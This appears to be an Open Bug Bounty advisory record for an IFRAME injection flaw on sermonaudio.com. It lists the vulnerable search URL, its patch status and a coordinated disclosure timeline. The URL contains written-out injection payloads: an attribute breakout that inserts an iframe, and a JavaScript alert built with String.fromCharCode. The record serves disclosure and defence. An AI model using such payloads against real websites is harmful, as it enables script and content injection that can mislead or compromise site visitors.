sermonaudio.com IFRAME Injection vulnerability

2016-03-30T10:17:00
ID OBB:143966
Type openbugbounty
Reporter ahmetomeroglu
Modified 2017-07-27T08:06:00

Description

Vulnerable URL:
http://www.sermonaudio.com/search.asp?speakerWithinSource=%22%3E%3Ciframe%20src=%22https://xssposed.org%22%3E&subsetCat;=&subsetItem;=&mediatype;=&includekeywords;=&exactverse;=&keyword;=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%2C80%2C79%2C83%2C69%2C68+%29%29%2F%2F%27%3B&keyworddesc;=B&currsection;=&AudioOnly;=false&speakerwithin;=&x;=0&y;=0
Details:

Description| Value
---|---
Patched:| Yes, at 27.07.2017
Latest check for patch:| 27.07.2017 08:06 GMT
Vulnerability type:| IFRAME Injection
Vulnerability status:| Publicly disclosed
Alexa Rank| 40361
Google Pagerank| 4
VIP website status:| Yes
Check sermonaudio.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 March, 2016 10:17 GMT
Generic security notifications sent to website owner| 30 March, 2016 10:20 GMT
Notification sent to subscribers (without technical details)| 30 March, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 22 June, 2016 11:11 GMT
Vulnerability patched by the website owner| 27 July, 2017 08:06 GMT